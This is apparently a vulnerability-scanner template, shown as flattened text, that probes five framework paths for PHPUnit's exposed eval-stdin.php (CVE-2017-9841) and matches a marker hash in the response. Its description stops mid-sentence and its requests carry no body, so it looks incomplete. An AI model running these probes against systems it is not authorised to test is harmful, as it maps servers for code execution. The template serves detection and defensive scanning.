id: CVE-2017-9841 info: name: PHPUnit - Remote Code Execution author: Random_Robbie,pikpikcu severity: critical description: PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a " - | GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: {{Hostname}} Content-Type: text/html - | GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: {{Hostname}} Content-Type: text/html - | GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: {{Hostname}} Content-Type: text/html - | GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: {{Hostname}} Content-Type: text/html - | GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: {{Hostname}} Content-Type: text/html matchers-condition: and matchers: - type: word part: body words: - "6dd70f16549456495373a337e6708865" - type: status status: - 200 # digest: 4a0a0047304502200344d3f9b23afd04585b40f71a66ede45d692271902682ad7cf6eb742fe3d5300221008ecdfb898894a882e56e2670684df37fac88d8f32113cad5a2b9004a2c06daf9:922c64590222798bb761d5b6d8e72950